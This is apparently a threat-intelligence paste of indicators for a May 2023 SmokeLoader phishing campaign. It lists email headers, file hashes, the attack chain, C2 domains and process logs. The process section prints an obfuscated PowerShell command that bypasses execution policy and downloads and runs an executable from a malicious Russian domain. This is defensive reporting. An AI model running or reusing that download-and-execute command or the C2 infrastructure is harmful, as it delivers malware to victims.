Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #IOC #OptiData #VR #smokeloader #ZIP #JS
- https://pastebin.com/RDVXCe0J
- previous_contact:
- https://pastebin.com/QpG70u8T
- https://pastebin.com/BJzcXqkK
- https://pastebin.com/kBW7nkZ5
- https://pastebin.com/Z7zq0YkW
- https://pastebin.com/b8PkhMyN
- https://pastebin.com/hkskwKvc
- https://pastebin.com/JmthzrL4
- https://pastebin.com/1scwT0f8
- https://pastebin.com/MP3kCSSh
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_smokeloader_111018/
- https://research.checkpoint.com/2019-resurgence-of-smokeloader/
- attack_vector
- --------------
- email attach .zip? > JS > WSH > PowerShell > GET 1URL > exe
- # # # # # # # #
- email_headers
- # # # # # # # #
- Return-Path: <prvs=14880d1fa8=inbox6@dl.kr-admin.gov.ua>
- Received: from kr-admin.gov.ua (mail.kr-admin.gov.ua [195.62.15.59])
- Received: from [127.0.0.1] by kr-admin.gov.ua (MDaemon PRO v9.6.1)
- Reply-To: stroybuts@ukr.net
- From: inbox6@dl.kr-admin.gov.ua
- Subject: рахунок від 02.05.2023
- Message-Id: <7D5F7EBF-2F2B-D454-AC28-B86320169DD9@dl.kr-admin.gov.ua>
- Date: Thu, 4 May 2023 07:23:20 +0300
- X-Mailer: iPad Mail (13E238)
- X-Authenticated-Sender: inbox6@dl.kr-admin.gov.ua
- # # # # # # # #
- files
- # # # # # # # #
- SHA-256 352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd
- File name pax_2023_AB1058.zip [ Zip archive data, at least v2.0 to extract ]
- File size 955.61 KB (978548 bytes)
- SHA-256 3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25
- File name pax_2023_AB1058.pdf [ PDF document, version 1.7 ]
- File size 1.13 MB (1180511 bytes)
- SHA-256 f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea
- File name pax_2023_AB1058..js [ JavaScript ]
- File size 28.29 KB (28967 bytes)
- SHA-256 cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae
- File name portable.exe (TempgEq94.exe) [ PE32 executable for MS Windows ]
- File size 263.50 KB (269824 bytes)
- # # # # # # # #
- activity
- # # # # # # # #
- PL_SCR http://homospoison{ .ru/one/portable.exe [193.106.175.177]
- C2
- http://coudzoom{ .ru/
- http://balkimotion{ .ru/
- http://ligaspace{ .ru/
- http://ipodromlan{ .ru/
- http://redport80{ .ru/
- http://superboler{ .com/
- http://lamazone{ .site/
- http://criticalosl{ .tech/
- http://3dstore{ .pro/
- http://humanitarydp{ .ug/
- http://shopersport{ .ru/
- http://sindoproperty{ .org/
- http://maximprofile{ .net/
- http://zaliphone{ .com/
- netwrk
- --------------
- 193.106.175.177 homospoison.ru 80 HTTP GET /one/portable.exe HTTP/1.1 Google Chrome
- comp
- --------------
- powershell.exe 193.106.175.177 homospoison.ru
- proc
- --------------
- "C:\Windows\System32\WScript.exe" "C:\Users\operator\Desktop\pax_2023_AB1058..js"
- "C:\Windows\System32\cmd.exe" /c pO^wErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','%temp%gEq94.exe'); & %temp%gEq94.exe & ZJHYOcunksxSdyp
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.We'; $v2='bClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://homospoison{ .ru/one/portable.exe','C:\Users\support\AppData\Local\TempgEq94.exe');
- C:\Users\support\AppData\Local\TempgEq94.exe
- persist
- --------------
- n/a
- drop
- --------------
- C:\Users\%username%\AppData\Local\TempgEq94.exe
- # # # # # # # #
- additional info
- # # # # # # # #
- TTPs: Query Registry System Information Discovery
- wscript.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Control Panel\International\Geo\Nation
- TTPs: Email Collection
- explorer.exe \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
- \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- \REGISTRY\USER\S-1-5-21-4238149048-355649189-894321705-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
- # # # # # # # #
- VT & Intezer
- # # # # # # # #
- https://www.virustotal.com/gui/file/352974cfdf1a7e182180f8c813a159ae44bb35268d76fae91ab64139be9200bd/details
- https://www.virustotal.com/gui/file/3c4440dde25ead7074bf3bf90aed31844310c3f1da90ff7e20922fad4c3eab25/details
- https://www.virustotal.com/gui/file/f4e72685fb3efa5bad200451d36c7d1e72a94515c515bdbb09c00254dca289ea/details
- https://www.virustotal.com/gui/file/cd0226a2b9c38ab99f2bbe4461b7fc9d4b07faafbe1ccc53d92bf08d1903a8ae/details
- https://analyze.intezer.com/analyses/27e7086e-09d8-4998-9e25-06c41e34a42d
- VR
Add Comment
Please, Sign In to add comment